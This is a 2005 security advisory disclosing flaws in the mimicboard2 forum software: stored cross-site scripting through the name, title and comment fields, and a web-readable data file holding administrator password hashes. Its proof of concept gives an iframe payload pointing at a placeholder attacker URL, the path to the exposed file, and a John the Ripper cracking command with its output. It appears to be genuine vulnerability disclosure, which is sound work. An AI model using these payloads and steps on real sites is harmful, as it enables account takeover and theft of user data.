------------------------------------------------------------
      - EXPL-A-2005-013 exploitlabs.com Advisory 042 -
------------------------------------------------------------
                   - mimicboard2 -






AFFECTED PRODUCTS
=================
mimicboard2 #086 < and lower
http://www.chitta.com/nobu/download/#mimic2




OVERVIEW
========
Mimic2 is a html open forum type of blog, tailored in
particular to the Japaneese market ( and is very popular )




DETAILS
=======
1. XSS

Mimic2 does not properly filter malicious script content.
XSS my be inserted in the name, title and comment sections.
The malicious script is the rendered upon visitation and 
is executed in the context of the users brower.

2. information disclosure

http://[host]/mimic2.dat is viewable via the webroot and has
no protection by default. mimic2 stores data in this file
consisting of:
a. administrator passwords
b. user information including refer ip address, message content
   and password if one was used in the post.



POC
===

1.
------
input malicious iframe script into the
comment, title and name  sections.
http://[host]/mimic2.cgi
eg:<iframe src="[attacker url]"></iframe>


2.
------
information disclosure

http://[host]/mimic2.dat
is viewable via the webroot nd has no protection by default.

mimic2 stores data in this file consisting of:
a. administrator passwords
b. user information including refer ip address, message content
   and password if one was used in the post.


the password(s) are easily crackable as evidenced by: 


mimic2.dat
C:\misc\john-16\run>john -w:password.lst mimic2.txt
Loaded 1 password (Standard DES [24/32 4K])
password         (mimic board2)

SOLUTION:
=========
vendor contact:
nobu@pt.imaginet.ne.jp Aug 24, 2005
no response Sept 8, 2005


Credits
=======
This vulnerability was discovered and researched by 
Donnie Werner of exploitlabs


mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web:	http://exploitlabs.com
web:	http://zone-h.org